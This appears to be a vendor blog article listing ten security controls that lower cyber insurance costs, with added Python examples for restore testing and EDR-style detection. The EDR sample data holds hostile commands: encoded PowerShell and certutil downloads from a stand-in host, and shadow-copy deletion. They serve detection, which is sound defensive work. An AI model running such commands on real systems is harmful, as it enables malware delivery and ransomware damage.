As the frequency and scope of cyberattacks increase, so does the cost of cyber insurance.
Worse, some companies that apply for coverage are being rejected outright: underwriters have concluded that they are a bad risk because they lack the controls and programs needed to protect against attacks.
Corporate legal teams are playing a larger role than ever in their organisation’s cybersecurity programs. According to the Association of Corporate Counsel 2022 State of Cybersecurity Report, cybersecurity reports to the Chief Legal Officer (CLO) in 38 percent of departments surveyed and 84 percent of CLOs now have at least some cybersecurity-related responsibilities (up from 76 percent in 2020).
How can your organisation maximise its ability to obtain cyber insurance while keeping costs contained to the extent possible?
Here are ten steps to combat the high cost of cyber insurance:
1. Implement Multi-Factor Authentication (MFA):
Enable MFA on every application and service that supports it, starting with remote access (VPN, remote desktop), email and administrative accounts. MFA protects confidential information, particularly on mission-critical and high-value data systems, because a stolen password alone is no longer enough to log in: the attacker also needs the second factor. Most underwriters' questionnaires now ask specifically whether MFA covers remote access and privileged accounts, so treat those as the minimum.
2. Apply Principles of Least Privilege (POLP):
Harden your organisation's security by tightly controlling access rights to its operating systems and applications. Create dedicated accounts with the minimum privileges required for a specific task (for example, service accounts that cannot log in interactively, and a separate non-privileged account for administrators' everyday work), review those rights regularly so they keep pace with role changes, and require the same of your cloud providers.
3. Apply Updates and Patches Promptly:
Keep software and operating systems up to date with the latest security patches. Monitor vendor advisories, prioritise fixes for vulnerabilities that are being actively exploited or that affect internet-facing systems, and apply them promptly: attackers watch the same advisories and routinely exploit a flaw within days of the fix being published.
4. Conduct Backup and Recovery Tests:
To be prepared for the worst, take regular backups of your key data and test restoring them on a schedule; a backup that has never been restored is unverified. Keep at least one copy offline or otherwise immutable so that ransomware that reaches your network cannot encrypt or delete it, and count a restore test as passed only when the restored data matches what was backed up and the systems that depend on it come back up. Tested backups are an invaluable control for limiting the disruption caused by malicious activity such as ransomware.
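A restore drill of the kind described above, as an added example (this is not the article's code): it backs up a directory to a tarball, records a SHA-256 manifest at backup time, restores the archive elsewhere and checks every restored file against the manifest. The sample files, the temporary paths and the `tamper` flag (which damages one restored file to show the check firing) are constructed for the demo; the `data` extraction filter is a real `tarfile` feature that stops a hostile archive from writing outside the restore directory.

```python
"""Restore-test drill: back up a directory to a tarball, restore it elsewhere and
verify every restored file against a SHA-256 manifest taken at backup time.
Added example, not the article's code; the sample files, paths and the tamper
flag are constructed here so the drill runs offline in a temporary directory."""
from __future__ import annotations

import hashlib
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large backups need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def make_manifest(root: Path) -> dict[str, str]:
    """Map each file's path (relative to root, POSIX separators) to its digest."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def backup(source: Path, archive: Path) -> dict[str, str]:
    """Write a gzip tarball of source and return the manifest recorded at backup time.
    Keep the manifest separate from the archive; it is what the restore test checks against."""
    manifest = make_manifest(source)
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(source, arcname=".")
    return manifest


def restore(archive: Path, target: Path) -> None:
    """Extract the archive. The 'data' filter (Python 3.12+, backported to 3.8.17+)
    refuses absolute paths, '..' components and links escaping target, so an archive
    from a compromised backup host cannot overwrite files elsewhere on the system."""
    with tarfile.open(archive, "r:gz") as tar:
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(target, **kwargs)


def verify_restore(manifest: dict[str, str], restored: Path) -> dict[str, list[str]]:
    """Compare the restored tree with the manifest. All three lists empty means the test passed."""
    actual = make_manifest(restored)
    return {
        "missing": sorted(k for k in manifest if k not in actual),
        "corrupt": sorted(k for k in manifest if k in actual and actual[k] != manifest[k]),
        "unexpected": sorted(k for k in actual if k not in manifest),
    }


def run_recovery_test(tamper: bool = False) -> dict[str, list[str]]:
    """Full drill on constructed sample data. With tamper=True one restored file is
    altered after extraction to show that a silently damaged restore is caught."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        source, archive, target = root / "data", root / "backup.tar.gz", root / "restore"
        (source / "db").mkdir(parents=True)
        (source / "db" / "customers.csv").write_text("id,name\n1,alice\n2,bob\n")
        (source / "config.ini").write_text("[app]\nmode=prod\n")
        manifest = backup(source, archive)
        target.mkdir()
        restore(archive, target)
        if tamper:
            (target / "db" / "customers.csv").write_text("id,name\n1,mallory\n")
        return verify_restore(manifest, target)


if __name__ == "__main__":
    print("clean restore:", run_recovery_test())
    print("tampered restore:", run_recovery_test(tamper=True))
```

In production the manifest would be signed or stored on a different system from the archive, and the drill would also start the dependent application against the restored data; the hash comparison shown here is the part that catches a corrupt or partial backup before you need it.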
5. Endpoint Detection and Response (EDR):
Protect your endpoints with an EDR solution. An EDR agent continuously collects telemetry from each device (process creation, file and registry changes, network connections), applies detection rules and behavioural analysis to spot malicious activity, and can respond automatically, for example by killing a process or isolating the host from the network while an analyst investigates.
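The collect, analyse, respond loop described above, as an added example rather than the article's or any vendor's code: a few constructed process-creation events are run through three detection rules (an Office application spawning a script host, PowerShell launched with an encoded command, and deletion of volume shadow copies), and each alert is mapped to an assumed response playbook. The event schema, rule names and playbook actions are assumptions made for this demo; a real agent ships far richer telemetry and enforces the response on the endpoint itself.

```python
"""Rules-based EDR-style detection with automated responses, run over constructed
process-creation events. Added example, not the article's code: the event schema,
rule names and response playbook are assumptions made for this demo."""
from __future__ import annotations

import base64
import json
import re
from dataclasses import dataclass, field
from typing import Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Deleting volume shadow copies is a classic precursor to ransomware encryption.
SHADOW_DELETE = re.compile(r"(?i)vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete")

# Automated response per severity (assumed playbook for this demo).
RESPONSE_PLAYBOOK = {
    "medium": ["raise-ticket"],
    "high": ["kill-process", "raise-ticket"],
    "critical": ["kill-process", "isolate-host", "page-on-call"],
}


@dataclass
class Alert:
    rule: str
    severity: str
    host: str
    pid: int
    detail: str
    actions: list[str] = field(default_factory=list)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; decode it so the analyst sees the script."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable payload>"


def basename(win_path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'winword.exe'."""
    return win_path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Alert]:
    """Apply the rules in priority order; the first match wins."""
    image, parent, cmd = basename(event["image"]), basename(event["parent_image"]), event["cmdline"]
    if SHADOW_DELETE.search(cmd):
        return Alert("shadow-copy-deletion", "critical", event["host"], event["pid"], cmd)
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        return Alert("office-app-spawned-script-host", "high", event["host"], event["pid"],
                     f"{parent} -> {image}: {cmd}")
    m = ENCODED_FLAG.search(cmd)
    if image in {"powershell.exe", "pwsh.exe"} and m:
        return Alert("powershell-encoded-command", "medium", event["host"], event["pid"],
                     decode_encoded_command(m.group(1)))
    return None


def respond(alert: Alert) -> Alert:
    """Attach the playbook's automated actions; a real agent would execute them on the host."""
    alert.actions = list(RESPONSE_PLAYBOOK[alert.severity])
    return alert


def analyse(lines: list[str]) -> list[Alert]:
    """Run every JSON-lines event through the rules and return the alerts with responses attached."""
    alerts = []
    for line in lines:
        alert = evaluate(json.loads(line))
        if alert is not None:
            alerts.append(respond(alert))
    return alerts


# Constructed sample telemetry (not real captures): one benign event, then one per rule.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [json.dumps(e) for e in (
    {"host": "ws-014", "pid": 4120, "user": "jsmith", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe"},
    {"host": "ws-014", "pid": 4388, "user": "jsmith",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -f http://example.invalid/x.exe C:\Users\Public\x.exe"},
    {"host": "ws-022", "pid": 5512, "user": "SYSTEM", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"host": "srv-db01", "pid": 912, "user": "Administrator", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
)]

if __name__ == "__main__":
    for a in analyse(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule} on {a.host} pid {a.pid}: {a.detail} -> {a.actions}")
```

The point of the decoded detail on the PowerShell rule is that the raw command line tells an analyst nothing; an agent that decodes the payload turns an opaque alert into one that can be triaged in seconds. Rules like these are deliberately narrow so they rarely fire on legitimate activity, which is what makes attaching an automatic kill or isolate action acceptable.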
6. Email Security Filters:
Keeping your email spam and malware filters current is an effective way to blunt phishing attempts, which remain a common entry point for attackers, and significantly reduces risk. Publishing SPF, DKIM and DMARC records for your own domains also makes it harder for attackers to spoof mail that appears to come from your organisation.
7. Implement a Mobile Device Management (MDM) Solution:
Implementing an MDM solution is a vital way to keep mobile devices secure, especially in a BYOD environment where personal and business data are mixed on one device. MDM lets the organisation enforce device encryption and a screen lock, keep business data in a managed container, and wipe that data remotely when a device is lost or an employee leaves.
8. Data Minimization, Encryption and Monitoring:
Maintaining data privacy is essential in our cyber-driven world. Data must be classified, managed and secured to reduce breach risk and support data minimisation: the less sensitive data you hold, the less there is to steal. Regularly eliminating redundant, obsolete or trivial (ROT) data removes potentially sensitive data from exposure to attackers and also meets the GDPR requirement to dispose of personal data promptly once it no longer serves its original purpose. Encrypt sensitive data at rest so that it stays protected if storage media, backups or snapshots are accessed by internal or external threats (encryption at rest protects the stored bytes, not data read through a legitimate account, and is only as strong as the protection of its keys), and monitor access to that data so that your organisation can react quickly and shut down a threat before it does damage.
9. Keep Policies and Procedures Documentation Evergreen:
Keep technology-related policies and procedures, such as credential and password requirements, evergreen: review them at least annually and whenever the environment changes, so that they still describe how your company's data is actually protected. Documented, current policies are also what an underwriter will ask to see as evidence that security best practices are in place.
10. Rigorous and Recurring Cyber Training:
To keep all employees current on the latest security protocols, provide comprehensive training at regular intervals along with refreshers, and supplement it with spot training to address newly identified risks, such as a phishing campaign targeting your industry, as they arise.
Cyber insurance is no different from any other insurance: its cost depends on the risk associated with the coverage. The sharp increase in the risk of cyber incidents is the primary driver of the growth of the global cyber insurance market, which is expected to grow from $9.29 billion in 2021 to $38.7 billion by 2030.
Just as auto insurers offer a discount for a safe driving record and home insurers for an installed home security system, cyber insurers are more likely to offer coverage to an organisation that demonstrates a comprehensive cybersecurity program, and more likely to offer lower rates for that coverage. Applying the ten steps above will maximise your organisation's ability to keep its cyber insurance costs in check.
For more information contact ITConnexion Team for a consultation.